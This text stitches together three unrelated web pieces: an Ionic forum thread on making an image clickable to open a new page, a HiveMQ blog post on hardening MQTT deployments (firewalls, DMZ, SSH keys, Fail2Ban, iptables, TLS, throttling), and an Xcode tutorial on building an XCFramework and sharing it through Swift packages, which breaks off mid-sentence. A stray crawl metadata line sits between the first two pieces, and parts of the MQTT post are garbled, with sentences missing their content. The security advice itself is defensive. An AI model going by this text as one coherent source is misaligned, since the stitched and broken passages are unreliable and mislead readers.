Hi , i am new using this framework need your help , Actually i want when i click on image a new page must be shown , how to do this ? sorry for my bad english Hi , i am new using this framework need your help , Actually i want when i click on image a new page must be shown , how to do this ? JUst add inside your image (click)="yourFunction()". Or make your image inside div: <div (click)="yourFunction()"> <img> </div> yes i did like (click)=“openPharmacyPage()” . but its not working it shows me error like this and code for openPharmacyPage is what’s the code of your function? i mean ‘openPage()’ can you show me your function openPage() yeah sure actually the real function is openPharmacyPage() and code of this function is This happens a lot just restart your server. ionic serve after restarting it showing me this error actually i dont want to open it in navigation or side menu i just want to open it like another screen just like first screen and screen will be the page named PharmacyPage I need to see your whole page.ts and page.html to be safe this is page.html and this is code in app.component.ts file where i have define function (click)=“openPharmacyPage()” within img please help me out its my semester project Just throwing it out there but it sounds like your stuff is in the wrong place. If your html is called “page.html” and that is where the click event is, then the function “openPharmacyPage()” would need to be in “Page.ts” not in “app.component.ts” The reason you are getting that error is because it can’t find the “openPharmacyPage” function in the correct scope. It is looking for it in “Page.ts” if i place it in page.ts i have to change code to display another page which i want to show and the code is not working in page.ts too i have checked Hmm… sounds like a scope problem to me. Based on your description either the “openPharmacyPage()” needs to be in Page.ts or your html that calls it would need to be in app.html. The project structure I am seeing based on what you’re saying and showing is this… src app.component.ts app.html app.module.ts app.scss main.ts pages list-page blood-page If this is correct, which of these holds the HTML that calls the function? One last thing I am noticing. You are not setting a root page in your app.component.ts file. You should set “this.rootPage” in app.component.ts, then move the “openPharmacyPage” function to that page, as well as the html. Most commonly you would do something like this in app.component.ts… @Component({ templateURL: 'app.html' }) export class MyApp { rootPage: any = HomePage; constructor(...) { platform.ready().then(() => { statusBar.styleDefault(); splashScreen.hide(); this.rootPage = HomePage; }); } } Then in home-page.ts you would have your main home page and the openPharmacyPage function, and in the home-page.html file you would have your html that calls the function. yes you are right Home-page holds that function if i want to do from home-page.html and home-page.ts then what changes i need to do If you wantt to do this all from HomePage then you are going to want you app.component.ts do nothing more than load up your HomePage, like so… app.component.ts import { Component } from '@angular/core'; import { Platform } from 'ionic-angular'; import { StatusBar } from '@ionic-native/status-bar'; import { SplashScreen } from '@ionic-native/splash-screen'; import { HomePage } from '../pages/home/home'; @Component({ templateUrl: 'app.html' }) export class MyApp { rootPage:any = HomePage; constructor( public platform: Platform, statusBar: StatusBar, splashScreen: SplashScreen ) { this.platform.ready().then(() => { statusBar.styleDefault(); splashScreen.hide(); this.rootPage = HomePage; }); } } Then in your app.html <ion-nav [root]="rootPage" #content</ion-nav> Now, in your home page you want the actual function and display, so something like… home.ts import { Component } from '@angular/core'; import { NavController } from 'ionic-angular'; import { BloodPage } from '../blood/blood'; @Component({ selector: 'home-page', templateURL: 'home.html' }) export class HomePage { constructor(public navCtrl: NavController) { } openPharmacyPage() { this.navCtrl.push(BloodPage); } } then your home.html <ion-header> <ion-navbar> <ion-title text-center>2Freedom!</ion-title> </ion-navbar> </ion-header> <ion-content> <div class="icons_div_left"> <span> <img class="icons_div_img_left" src="../../assets/icon/im..." (click)="openPharmacyPage()"> </span> <span class="txt_divs_left"> Medicine </span> </div> </ion-content> Obviously change names as you need to for correct directories, but that is about what it should be. Thank you soo much you help me a lot its really great No problem. I know how hard it can be to be stuck on this stuff. If you need anymore help don’t hesitate to ask. yes sure Thank you But may be due to my region every time i have to wait for at least 8 minutes to reply you back
https://forum.ionicframework.com/t/how-to-make-clickable-images/97742
CC-MAIN-2020-40
refinedweb
829
66.44
MQTT Security Fundamentals – Securing MQTT Systems Welcome to the tenth part of the MQTT Security Fundamentals Blog post series. In the last posts we focused on how to secure MQTT on a protocol level and shared best practices how to implement security on the application level. Todays blog post will focus on the secure deployment of a MQTT system. We will take a look on different layers of security and how to harden the deployment to prevent and mitigate attacks. There are different layers of security we need to discuss, in particular we are going to look at these layers: - The Infrastructure - The operating system - The MQTT Broker Infrastructure MQTT brokers are typically deployed on some kind of network infrastructure, so it’s very important to understand the network topology of the target system and it’s important to lock out attackers as soon as possible in order to prevent damage and downtime on downstream systems. Firewall Every connection to a MQTT broker should at least pass one firewall which implements sophisticated rules for accessing downstream components and parts of the infrastructure. If your are able to block attackers at the firewall level, they won’t be able to access any other systems. Unfortunately there is no silver bullet and firewall rules need to be configured according to the concrete use. There are many commercial and open source firewall solutions available. A rule of thumb is, that only expected traffic gets forwarded to downstream systems. That means, any traffic which you don’t expect in your downstream applications should be blocked. In case of operating an MQTT broker the following traffic could be worth blocking: - UDP: MQTT uses TCP, so you can block all UDP datagram packets. - ICMP: While it may not be the smartest idea to block all ICMP traffic, ping and traceroute ICMP packets could be worth investigating as candidates to block. It’s also a good idea to block traffic to any ports which are not needed for your MQTT system. The following MQTT standard ports should not get blocked, you should only allow traffic by the defined IP ranges. This will lock out any clients which are not in the defined IP ranges. Load balancer Load balancers are often used to distribute MQTT traffic to different MQTT brokers, e.g. if the brokers are operated in a cluster. Often these load balancers are proxying the traffic, so it’s important to have a load balancer deployed which can handle the traffic and the connection amount you’re expecting for your production system. Most of the commercial hardware based load balancers can handle huge amounts of connections and are designed for high-traffic scenarios, so typically these just work out of the box. Load balancers typically don’t add much additional security but they are very useful to prevent overload of downstream systems and distribute the traffic to multiple MQTT brokers. Most load balancers are also able to throttle traffic if the traffic is unusually high and you need to slow down MQTT clients in order to prevent overloading of MQTT brokers. DMZ A DMZ is a demilitarized zone and typically internet facing services (like a MQTT broker) reside here. A DMZ is a subnetwork and all access to downstream services (like databases, internal application services) is protected by an additional firewall. So if an attacker gets access to one of your services in the DMZ the attacker doesn’t get access to other systems (if the firewall is configured properly). In case of a dual-firewall scenario, often firewalls from different vendors are used so attackers can’t use the same compromising techniques if they are able to exploit security holes of a deployed firewall. The Wikipedia article about DMZs is worth a read if you’re not familiar with the concept. If you are using HiveMQ plugins to access any internal business services (e.g. webservices or authentication services), we strongly recommend deploying a DMZ. Operating System MQTT Brokers are most likely installed on servers (virtual and physical) and these servers run an operating system. Before talking about MQTT broker application security, it’s very important to understand that many attacks focus on security holes in the operating system or software and services which are typically installed with the operating system. While it’s out of scope of this blog post to give a complete overview of hardening servers, we want to share some tips we found useful for making servers more secure. Please note that the following tips are only valid for Linux based servers. Keep libraries and software updated There is no bug-free software and unfortunately some bugs result in security holes. So please keep your system and your software up-to-date. Recent famous security related bugs like the GHOST vulnerability were very simple to fix: By updating specific libraries and software (in the GHOST case, the glibc version). If you are relying on libraries which implement cryptographic algorithms like openSSH or openSSL, it’s critical to update these if new security holes are revealed, because these insecure libraries can affect other software. Fortunately it’s very easy to stay up-to-date since most Linux distributions have a dedicated package manager which can update all outdated software at once. Disallow root access and use SSH keys for SSH. If you are using SSH to connect to your server, always disallow root access via SSH, especially if your SSH port is open to the world. Another best practice is to disable password authentication via SSH and use SSH keys for authentication. This adds another layer of security because brute force attempts won’t succeed (in contrast to weak passwords if using password authentication). Installing Fail2Ban Fail2Ban is a neat software which scans different log files on your linux box (like the SSH log) and detects brute force attacks. It will automatically update your firewall (like iptables) in order to lock out the attackers. This tool is invaluable if access to SSH ports is possible via the internet. Set up iptables If you don’t have any external firewall deployed, setting up iptables should be mandatory. Iptables is a software firewall which is preinstalled on most Linux distributions. Even if you have external firewalls, using iptables is highly recommended. Some people may find configuring iptables challenging, fortunately there are tools available which eases the burden of maintaining complex iptables rules, like ShoreWall or UFW. Other tools like Fail2Ban rely on iptables and automatically update the rules if malicious clients are detected. SELinux Security Enhanced Linux gained. Good practical starting points for securing your Linux systems are the following links: MQTT Broker Even if a reliable and secure network infrastructure is in place and your Linux system is hardened, there are still some improvements, e.g. by separating topic namespaces. X509 client certificates add another layer of security and you should consider using them if it’s feasible for your concrete use case. TLS Secure MQTT deployments typically use TLS for transport layer encryption, so no eavesdropper can read and intercept the MQTT traffic from broker to clients and vice versa. While TLS adds extra bandwidth overhead to the communication, the gained security is almost always worth it. If you haven’t read it yet, we suggest to take a look at our blog post about MQTT and TLS. Throttling If you know the bandwidth usage characteristics of your MQTT deployment beforehand, throttling MQTT clients can add additional protection for overloading MQTT brokers. Today bandwidth is still expensive and limited. Few malicious MQTT clients with enough bandwidth available can overload your system very quickly and consume all your bandwidth which may lead to service degradation and can be very expensive. HiveMQ allows to throttle on a global and a per-client basis. You can limit the total incoming bytes per second and the total outgoing bytes per second independently, so if you know you can only afford 20mbit of traffic (otherwise traffic would get too expensive) but your network and network interfaces can handle 100mbit, it may be wise to throttle the broker to this limit. These limits can be changed while HiveMQ is up and running and no restart is needed. In addition to the global throttling, it’s possible to throttle specific clients (e.g. based on client identifier) with the HiveMQ plugin system after the clients authenticated successfully. Message Size MQTT defines a maximum message size of 256MB. In most MQTT deployment scenarios messages are much smaller, often small than a kilobyte. If you know your usage scenario very well and you know the maximum message size that can occur, it’s a wise decision to decrease the maximum allowed message size to that limit. Malicious MQTT clients could send huge messages otherwise, which may result in excessive memory consumption and unneeded bandwidth usage. HiveMQ allows to limit the maximum message size on a global and per-client basis. Summary We have seen that securing MQTT systems – like any IT system – can be challenging and security needs to be considered at many levels. We have seen that it’s important to know your network infrastructure and your servers very well and they need to be configured conscientiously. If you missed an important tip or feel that we should add additional things, let us know in the comments! So that’s the end of part ten.
https://www.hivemq.com/blog/mqtt-security-fundamentals-securing-mqtt-systems
CC-MAIN-2018-22
refinedweb
1,565
50.46
module location doesn't seem to work I am new to Pythonista and learning every day more about this wonderful app. I am trying to use location.get_location(), but all I get is None. I know that I should allow Pythonista to use the location, but I never got the question for permission. Also, I can't see Pythonista in the list of apps with/without access to location services in Privacy/Location Services setting. Please advise. Does this work? import location, time def getLocation(): location.start_updates() time.sleep(1) # give GPS hardware a second to wake up currLoc = location.get_location() location.stop_updates() # stop GPS hardware ASAP to save battery return currLoc print(getLocation()) Yes, this works! Thank you very much.
https://forum.omz-software.com/topic/508/module-location-doesn-t-seem-to-work
CC-MAIN-2017-47
refinedweb
121
60.31
Hi, I purchased your component yesterday after testing some of our in-house pdfs. It worked fine at the time, but since I purchased it, I’ve been getting mixed results with jpg conversion. I have attached 4 files below, 2 pdfs and their resulting jpgs: E008DJR091811.pdf -> 10.jpg budget_blinds.pdf -> 11.jpg I started with the E008 pdf file and converted it to the 10.jpg. You’ll see that it’s only one side of the page and the font is jumbled. I then took the E008 pdf and cropped the budget_blinds ad and saved it as a PDF in photoshop, then converted it using aspose.PDF. This resulted in a blank image so I opened opened the budget_blinds.pdf in Acrobat and saved it as an optimized PDF then converted to jpg with Aspose.PDF again, which again resulted in a blank image. Am I doing something wrong, or the PDFs poorly formed, or is there an issue with the PDF conversion? Hi, Hi Michael,<?xml:namespace prefix = o Thank you for considering Aspose. I tested your scenario with your shared template files and I am able to reproduce the issues your mentioned. Your issues are logged in our issue tracking system with issue ids: PDFNEWNET-30757 and PDFNEWNET-30758. Our development team will look into these issues and we will update you via this forum thread regarding any update. Sorry for the inconvenience, The issues you have found earlier (filed as 30757) have been fixed in this update. This message was posted using Notification2Forum from Downloads module by aspose.notifier. The issues you have found earlier (filed as PDFNET-30758) have been fixed in Aspose.PDF for .NET 20.3.
https://forum.aspose.com/t/pdf-to-jpg-results-in-blank-image/104642
CC-MAIN-2021-39
refinedweb
285
73.47
Hi All, I have being quite busy lately trying to improve WebDAV support for Zope3. To this end I have two proposals worth your consideration. I don't yet have access to the proposals area of zope.org but I have put them up in my home folder on zope.org for the time being. They are: :-) WebDAV? Namespace Management Here I define how, and why, I am planning to manage a WebDAV namespace. This includes how to find which properties are defined on a object, and what widget to use to display the property, and how to extend an already registered WebDAV namespace. My goal for all this has being to develop zope.app.dav to a point where it can handle all of the WebDAV protocol details according to the RFC2518 specification, while only requiring a minimal knowledge of WebDAV from developers who just wish to integrate WebDAV protocol into there application. Also I have being doing a lot of reading of specifications and by using these changes I hope to begin development of other WebDAV protocols once I have finished with the core WebDAV support. Hope you like it, and any improvements / comments will be most appreciated. Michael -- Michael Kerrin 55 Fitzwilliam Sq., Dublin 2. Tel: 087 688 3894 _______________________________________________ Zope3-dev mailing list Zope3-dev@zope.org Unsub:
https://www.mail-archive.com/zope3-dev@zope.org/msg03918.html
CC-MAIN-2018-47
refinedweb
222
64.51
Adding a Mailing List to Your Gatsby Site Yes, we all get far too much emails. There's basically a whole sub-genre of memes dedicated to the topic, such as... Nonetheless, newsletters and mailing lists are often one of the most effective ways we have to communicate with our users, customers, readers, etc. So, what if I wanted to create a simple form on my site that let people enter their email and sign up for my mailing list. In this post, we'll quickly look at how you can add a newsletter sign up form to a Gatsby site that automatically subscribes a user to a mailing list on Mailchimp. The site we'll work on was built built using Stackbit, so if you used Stackbit to build your Gatsby site, it'll be easy to follow along, however there is nothing Stackbit specific about the code and integrations. You can find the code in this sample project, where I've been working on a number upgrades to an existing Stackbit generated site. Installing and Configuring the Gatsby Plugin You probably won't be surprised that Gatsby already has a plugin to integrate with Mailchimp. We'll take advantage of this as it makes the process of adding a subscription form much simpler. Start by installing the plugin into your existing project: npm install gatsby-plugin-mailchimp The plugin has very a minimal amount of required configuration. While it has some additional options that you can read about in the documentation, the only required configuration parameter is a Mailchimp endpoint. For example, here is the configuration added to plugins within my gatsby-config.js: ... { resolve: 'gatsby-plugin-mailchimp', options: { endpoint: '' } } To obtain your enpoint URL, log into your Mailchimp account and go to "Audience" > "All Contacts" from the top navigation. Once there, click "Signup forms" and then "Embedded forms". This will open a page with HTML that you can copy to add an embedded form on your site. However, we don't want the full embedded form code as we are creating a custom form. We only want the endpoint URL in the action attribute of the form as seen below. Paste that URL into the endpoint option for the plugin configuration and we are done with configuration. Updating the Form Code You can create your subscribe form code from scratch depending on what site you are working on. If you are building your own, you can skip ahead to the finished component. In my case, my site was generated using Stackbit's Azimuth template that already has an existing SubscribeForm.js component that renders a mailing list sunscription form. It has been preconfigured to submit directly to Netlify's Forms functionality. Here's the code: import React from 'react'; export default class SubscribeForm extends React.Component { render() { return ( <form name="subscribeForm" method="POST" netlifyHoneypot="bot-field" data- <div className="screen-reader-text"> <label> Don't fill this out if you're human: <input name="bot-field" /> </label> </div> <div className="form-row"> <label> <span className="screen-reader-text">Email address</span> <input className="subscribe-email" type="email" name="email" placeholder="Enter Email Address..." /> </label> </div> <input type="hidden" name="form-name" value="subscribeForm" /> <button className="button" type="submit"> Subscribe </button> </form> ); } } First, let's remove the code specific to Netlify Forms. Remove the netlifyHoneypot="bot-field" data-netlify="true" from the form tag. Remove the entire div containing the bot-field hidden form field. Finally, remove the hidden form-name field. The finished form component is simple, only containing a single form input for the email and a submit button. It should look something like this: import React from 'react'; export default class SubscribeForm extends React.Component { render() { return ( <form name="subscribeForm" method="POST" id="subscribe-form" className="subscribe-form"> <div className="form-row"> <label> <span className="screen-reader-text">Email address</span> <input className="subscribe-email" type="email" name="email" placeholder="Enter Email Address..." /> </label> </div> <button className="button" type="submit"> Subscribe </button> </form> ); } } Connecting the Form to Mailchimp The first thing we'll need to do is add state to the component. The first item will be message that will hold the response sent back from Mailchimp via the plugin (this already sends friendly HTML formatted messages we can use). The handleInputChange method is taken directly from Gatsby's handling forms documentation for updating the state based upon form input changes. state = { email: '', message: '' }; handleInputChange = (event) => { const target = event.target; const value = target.value; const name = target.name; this.setState({ [name]: value }); }; Next, let's connect the value of our email input to the component state and handle updating the state. <input className="subscribe-email" type="email" name="email" placeholder="Enter Email Address..." value="{this.state.email}" onChange="{this.handleInputChange}" /> Next, we need some way to display the message response to the user. We'll want that to be highlighted in some meaningful way. For example, within Azimuth, I added a new style to _general.scss under the subscribe form section that uses the bright orange accent color already configured in the styles. .message { color: _palette(accent-orange); } Now let's add the message to the form by adding a div before the form-row containing the email input. <div className="message" dangerouslySetInnerHTML="{{" __html: this.state.message}} /> Now we're ready to make the final connection to the plugin. Of course, we need to add the plugin to our imports. import addToMailchimp from 'gatsby-plugin-mailchimp'; Let's add the submit handler. The code for this is only a few lines, passing the email to the call to Mailchimp and setting the message in our state to the message in the response. handleSubmit = async (e) => { e.preventDefault(); const result = await addToMailchimp(this.state.email); this.setState({ message: result.msg }); }; Finally, we just need to wire the form to call this function when the user clicks submit by adding an onsubmit handler to the form: onSubmit={this.handleSubmit} The Form in Action and Next Steps We're done! Let's go ahead and test this out. I've connected mine to an existing mailing list I had for new and throwback music picks called Coda Breaker. Entering an email address that is not yet subscribed will display a message indicating that they need to confirm their subscription as that is how our email list is configured in Mailchimp. If I enter an email address that is already subscribed, I'll get an error message like the following: Moving forward, you may want to expand your form to include more information about the user for your list, and that is completely possible using the plugin. The plugin allows for a second parameter to the addToMailchimp function called listFields, which is a structure containing additional values about the user for your list. You can reference the plugin documentation for more details. Documentation sites are a longstanding and common use case for the JAMstack. In this post we explore some of the options available to you for developing them and show an example of how to build one.
https://www.stackbit.com/blog/jamstack-gatsby-mailchimp/
CC-MAIN-2022-05
refinedweb
1,179
54.42
In WWDC 2019, Apple announced a brand new feature for Xcode 11; the capability to create a new kind of binary frameworks with a special format called XCFramework. That was fantastic news to anyone, since an ongoing inconvenient situation that was lasting for years finally came to its end. Up until then, a binary framework could be used in one target platform only, and for a specific family of devices. For example, it was officially impossible to build a framework that would contain code aiming on both real iOS devices and the Simulator; unofficial solutions had come up of course with the so-called fat frameworks, however such a framework usually didn’t make it all the way to App Store; it was a good reason for rejection, so fat frameworks were good just for development. Similarly, it was impossible to add a single framework to multiple platforms, such as on both iOS and macOS, so distributing different frameworks for different platforms was the rule. All that came to change with the XCFramework format, since it’s a type of framework that provides a common roof for multiple variants of the same framework. A XCFramework can wrap up a variant of a framework that would be working on iOS devices, another variant that would be working on Simulator, another one for macOS, one more for watchOS, and so on. In short, XCFramework can bundle up any framework with flavours for any platform or device that Xcode supports. Everything in one single place, with one single item to distribute only. However, all that is news from last year. This year, in WWDC 2020, Apple announced something else regarding XCFrameworks that boosts their distribution, starting in Xcode 12, Swift packages can be used to distribute binary frameworks of the XCFramework format. That is really amazing news, because so far a Swift package could be used in order to distribute only open-source code. Now, it’s becoming feasible to distribute binary code as well bundled up in a XCFramework. We had talked thoroughly about Swift packages in the past in this post, and you’re prompted to read it if you haven’t done so already. This post is dedicated to all the above, and to be specific, it has a double goal: - To teach how to create a XCFramework binary framework based on frameworks variants that provide similar functionality for multiple target platforms. - To teach learn how to use Swift packages in order to distribute a XCFramework, either those are local or remote. Before I present the roadmap of this tutorial, I really recommend you to watch the WWDC 2019 – Session 416, because it contains several interesting stuff that won’t be discussed here, such as versioning or framework author considerations. You should also watch this year’s video about how to distribute binary frameworks as Swift packages as it will give you an overview of how all this works. Finally, keep this help page as it provides the outline on how to create a XCFramework. Having said all the above, let’s have a quick look to what’s coming next, and then let’s start working our way towards the creation of a XCFramework binary framework. An Overview Of What’s Coming Up One could say that this tutorial is composed by two parts. The first one is the place where we’re going to learn how to create a XCFramework binary framework from the beginning. In order to do that, we’ll start from scratch with two other frameworks that offer similar features for both iOS and macOS platforms, and we’ll use Terminal (extensively in this post) to archive them, to build the desired XCFramework, as well as to perform other command line based tasks. The final goal here is to make it possible to add the same binary framework only (the XCFramework) to an iOS and a macOS application, and have everything work properly in all possible devices; iOS devices, Simulator, Macs. The second part of the tutorial focuses on how to use the XCFramework that we’ll produce in the first step along with Swift packages. In fact, we’ll meet two different variations of that; in the first one, we’ll see how to have a binary framework as a Swift package where both the framework and the package exist locally. In the second, we’ll learn how to make both of them reside remotely, with the binary framework and the package being stored in different locations but still being possible to use them as one entity. Even though we’ll create various projects in Xcode in order to create the base frameworks or the Swift packages, the demo applications that we’ll use to try everything on can be downloaded from here. What you’ll find in that starter pack is two projects, one for iOS and one for macOS, that contain a view subclass (UIView and NSView respectively) along with a counterpart XIB file. In the next part you’re going to understand what these views are all about, and what we want to achieve with them. For now download that starter material, take a quick look if you want, and then get ready for some really interesting work. Creating The Two Binary Frameworks We’ll start off by creating the two frameworks mentioned in the previous part from scratch. One for the iOS platform, and one for macOS. We’ll add similar source code to both of them that will be performing the exact same functionality on both platforms, which will be no more than just loading a view’s contents from a XIB file. That simple functionality is more than enough in order to demonstrate the topic of this post, and it has the least importance in the overall process. Focusing for a moment on the source code, both frameworks will implement a protocol called XIBLoadable. It will contain two required methods; one for loading the XIB contents, and one that will be adding the view object using XIBLoadable to its parent view by setting the necessary auto layout constraints. A default implementation of both methods will be provided in a protocol’s extension, so they can be used out of the box on each platform. Obviously, their implementation will depend on the UIKit framework on iOS, and on the AppKit framework on macOS. However, the way they’ll be used eventually is going to be identical for both platforms. The best thing above all is that the same framework (XCFramework) will be used in both cases! Before we begin, you are advised to store both framework projects we’re just about to create in the same subfolder. This will help you get along smoothly later with the commands that we’ll need to write on Terminal. With that said, it’s about time to bring the iOS based framework to life. The XIBLoadable-iOS Framework In Xcode, go to the File > New > Project… menu in order to start a new project. Choose the iOS platform, and the Framework template in the Framework & Library section. In the next step name the framework as XIBLoadable-iOS. We’ll call the macOS version XIBLoadable-macOS respectively, and that naming will help perform common operations on both frameworks, making possible to easily distinguish them later on. Finally, find a proper place to save the new project in your disk and get finished with that creation process. Right after the project gets ready and lies just in front of your eyes, press Cmd+N in your keyboard and choose to create a new Swift File for the iOS platform. We need a source file in order to add the XIBLoadable protocol implementation. It doesn’t really matter how that file will be named. For convenience though, let’s give it the name of the protocol we’ll implement right next; XIBLoadable. Once the new file is created, start by replacing the existing import statement with the following: Next, let’s define the protocol along with the two required methods: See that the protocol is marked as public in order to be accessible from any other module that will be using it (such as the demo project you downloaded). The two methods will also be marked as public in the default implementation that is coming right next. Note: Want to know more about access levels in Swift? Take a look at this tutorial. Right after the protocol’s closing, add its extension: The Self: UIView condition limits the use of the protocol methods to UIView types only; what they’re supposed to do is meaningful just to views, so no other type should be able to use the default implementation. Next, here’s the default implementation for the first method: Describing the above shortly, the method first tries to load the contents of the XIB file given as an argument. If for some reason that fails, it returns false. Otherwise, is adds the top level view loaded from the XIB as a subview to the current view object that adopts the XIBLoadable protocol, and sets the necessary auto layout constraints. It’s marked with the @discardableResult attribute in case the result value of the method is not necessary to be used. The next method now: This one simply adds the view using the XIBLoadable protocol to the given view as a subview, and snaps it to all of the parent view edges by setting the auto layout constraints using the matching anchors as shown above. The implementation of the source code in the XIBLoadable-iOS framework is now done. With all the above now in place, let’s do the same in a new framework that will be targeting the macOS platform. The XIBLoadable-macOS Framework We’re going to repeat the above steps here in order to create the macOS-based framework, but since they have all already been presented, this part is going to be faster than before. So, start with another new project in Xcode, but this time make sure to choose the macOS platform, and then the Framework template in the Framework & Library section. In the next step fill in the product name field with the XIBLoadable-macOS value. Eventually, save the new project in the disk, in the same subfolder where you stored the XIBLoadable-iOS project as well. Doing so will better help follow the steps coming up next. With the new project ready, press Cmd+N and create a new Swift file. Once again, even though the file name is not important, name it XIBLoadable just for convention and to be in align to what we’ve already done. Similarly to what we previously did, start by replacing the default import statement with the following: AppKit is the counterpart framework of UIKit on macOS, and as we were needing UIKit in order to work with UIView, here we need AppKit to work with NSView. Let’s add the XIBLoadable protocol definition now, with the exact two methods as before: Passing to the default implementation of the methods, first let’s define the protocol’s extension: Here’s the implementation of the first method: The way to load XIB contents on macOS is slightly different comparing to iOS, but the final result remains the same; this method loads the first top level view it finds along with its contents in the given XIB file, and adds it as a subview to the view object that adopts the XIBLoadable protocol. Note: To find out more about this method and about how to create custom views on macOS, please read this macOS tutorial. The implementation of the second protocol’s required method is identical to the equivalent one in the previous part. The only difference is that instead of using the UIView class, we’re using the NSView: The source code implementation is now complete on the macOS-based framework too. In the next step we’re going to archive both frameworks using Terminal, and after that we’ll eventually build the single XCFramework that will contain all the above. Archiving The Frameworks As just said, the next step in the flow is to archive both frameworks created previously like any other project that we usually archive in Xcode. However, we’ll use Terminal for doing that; it’s the recommended way for being possible later to build the XCFramework. Regarding the iOS-based framework, we’re going to create two different archives. One that will be working on real iOS devices, and one that will be working in the Simulator. The process will be almost identical in order to create the archives; as you’ll see, there will be only minor changes that will let us generate the Simulator archive. In Finder, select the XIBLoadable-iOS project folder and right click on it. Then go to menu Services > New Terminal at Folder as the following image shows: This will open a new Terminal window with the path already specified to the iOS-based framework folder. Before archiving the framework, let’s create another folder where we’ll output the archived frameworks, as well as the final XCFramework. Normally that’s not mandatory to do. All new archives are saved in the /Users/username/Library/Developer/Xcode/Archives folder by default. However, working with custom folders here we’ll help the overall educational purpose of the tutorial and the easier usage of the Terminal commands. We’ll create that new folder as a subfolder of the one that contains the XIBLoadable-iOS and XIBLoadable-macOS projects. You can do that either in Finder, or with the following command in Terminal: The “../” points to the parent folder in folders hierarchy, and the “output” name is following right after. You should be seeing the following folders now: Now we can use the xcodebuild archive command to create the archive meant for actual iOS devices. In the series of options given to the command following next, notice that: - The destinationoption specifies the target platform and devices. - The path to the folder that the archive will be stored into is specified with the archivePathoption. - We set SKIP_INSTALLand BUILD_LIBRARY_FOR_DISTRIBUTIONsettings to NO and YES respectively, and it’s really crucial not to skip them. The first one will install the framework to the archive that will be created, while the second one will make all the necessary configuration so the framework that will be written in the archive to be distributable. Note that both of these settings can be also set in Xcode, in the Build Settings tab of the project target, but specifying them here guarantees that they’ll work as expected. Press the Return key once you type or paste the above in Terminal to execute the command. The backslash character (“\”) makes it possible to break the command parameters in multiple lines, making it more readable that way. After a few moments and a bunch of output to Terminal, you should be seeing the XIBLoadable-iOS archive created in the output folder. Now let’s create the archive for the iOS Simulator destination. The Terminal command is pretty much the same; the destination and the archive path are the two things changed here: Now you should be seeing two archives in the output folder: Let’s do the same for the macOS-based framework. Here we’ll generate one archive only. First though, let’s change the working folder and let’s jump in the XIBLoadable-macOS that contains the respective framework: Similarly as before, the following command creates the archive for this framework. Once again, we change the destination and archive path as necessary: When archiving is finished, the archives folder should be containing three archives: With the archives generated, we can now move on to building the desired XCFramework. But first, let’s examine them a bit. Building The XCFramework An archive is a package of files, and it can be opened in order to see what it contains. You can choose any of the three archives we created, right click on it, and select the Show Package Contents option from the context menu. The framework we want to reach on each package is under the Products > Library > Frameworks folder. And guess what; a framework is actually a folder that contains other files and subfolders. In Terminal, accessing the framework inside a package is like accessing any other normal folder. For example, the following will list the framework’s contents in the XIBLoadable-iOS archive: The above command assumes that we’re already inside the output folder, so before writing the above in Terminal, change the working directory to the output directory. Anyway, we’d need to do so in order to build the XCFramework: Creating the XCFramework is just a matter of a simple command in Terminal; the xcodebuild -create-xcframework. Provided options must contain two things: - The path to each framework; in this case it’s going to be the path to the framework inside each package as just said right above. - The output folder where the XCFramework is going to be written to. Here it’s going to be the output folder. With that information in mind, here’s the full command that will create the XCFramework: A few moments later after pressing the Return key on the keyboard, the XCFramework will show up in the output folder, along with the archives created previously. If you expand or open it, you’ll see that all three frameworks for each destination are contained in it: After a small number of steps we eventually managed to achieve our first goal in this post; to create the XCFramework that contains the other two frameworks for three different destinations; iOS devices, iOS Simulator and macOS systems. With the XCFramework being now available, let’s give it a spin before we pass to the creation of a Swift package that we’ll use to distribute and share that new framework. Trying Out The Built XCFramework Time to use the starter projects you downloaded earlier. Open the LoadableViewDemo-iOS project in Xcode first, in order to test the XCFramework we just built on the iOS platform. At first, select the project in the Project navigator, and then open the General tab. Place Finder next to Xcode, and then drag and drop the XIBLoadable.xcframework folder in the Frameworks, Libraries, and Embedded Content section in Xcode. You’ll notice that a new group called Frameworks has been created in Xcode automatically, and it contains the framework that we just dragged in it. Next, press Cmd+B to build the project once, and then open the DemoView.swift file. Right below the existing import statement, add the following: While typing it, you’ll see that Xcode suggests it automatically. Note: If there’s no auto-completion in Xcode, then you might need to close and restart it. Then, update the DemoView class header so it adopts the XIBLoadable protocol: The DemoView class has a XIB counterpart file that we want to load contents from. Let’s do so in the init() method using the load(from:) protocol’s method: The "\(Self.self)" argument provides the name of the current class a String value. Instead of that, we could have written the following: In this case we explicitly specify the XIB name to use. Switching to the ViewController.swift file now, let’s go to the viewWillAppear(_:) method to initialise the demoView object that’s already declared in the ViewController class. In fact, not only we’ll make the initialisation, but we’ll also call the add(to:) protocol’s method through demoView in order to add that view to the root view of the view controller and set its constraints automatically. The moment of truth has finally come. For starters, let’s run the app in the Simulator and see if the DemoView contents will appear on screen. Seeing that it’s working in Simulator, let’s run to an actual device to see if it’ll work there too. And yes, it works on the device as well! Finally, we’re left to test it on the LoadableViewDemo-macOS demo app too. Open it in Xcode, and follow the procedure described above to add the XIBLoadable.xcframework to the Frameworks, Libraries, and Embedded Content section, in the General tab of the project target. After doing so, press Cmd+B to build the project once. Then, open the DemoView.swift file, and add the following import statement right below the import Cocoa: As it happened in the iOS project, Xcode recognises and auto-suggests the proper framework to use; in this case the XIBLoadable_macOS. Then, adopt the XIBLoadable protocol: Finally, in the init() method load the XIB file’s contents: Open the ViewController.swift file and in the viewWillAppear() method initialise the demoView object exactly as before, and then add it to the root view of the view controller: Press Cmd+R to run the app. Here’s what you should see: The XCFramework is working as it supposed to, so let’s focus on the second goal of this post; to create a Swift package that will be used to easily distribute the XCFramework and add it as a dependency to a project. Binary Framework In A Swift Package We’ve already talked about Swift packages a couple of times in the past. In particular, we’ve posted a hands-on tutorial on how to create a Swift package (which I recommend you to read if you haven’t done so), and how to reuse SwiftUI views with Swift packages. So here I won’t stick to the details of making a Swift package, instead I’ll take as granted that you have a basic knowledge about it. In case you want to make yourself comfortable with Swift packages, then check out the first link I just provided and then keep reading here. Up until Xcode 12, Swift packages had been useful for distributing and sharing source code that was visible to everyone. A Swift package was definitely not the ideal way to distribute closed-sourced projects and binary code, but all that have changed with Xcode 12. As of that version, packages can be the vessel for distributing binary code, and to be precise, binary frameworks in the XCFramework format, just like the one we created right above. Usually Swift packages exist in remote repositories, such as on GitHub. Now that binary frameworks can be contained in them, a package’s checkout time might increase considerably depending the size of the framework. In order to avoid that, frameworks can be hosted in other servers compressed as zip archives. URL to the framework is what is actually needed in such cases, without being necessary for it to be contained in the package. All that regard remote packages with binary frameworks residing remotely as well. However, it’s also possible to keep and use both the Swift package and the framework from 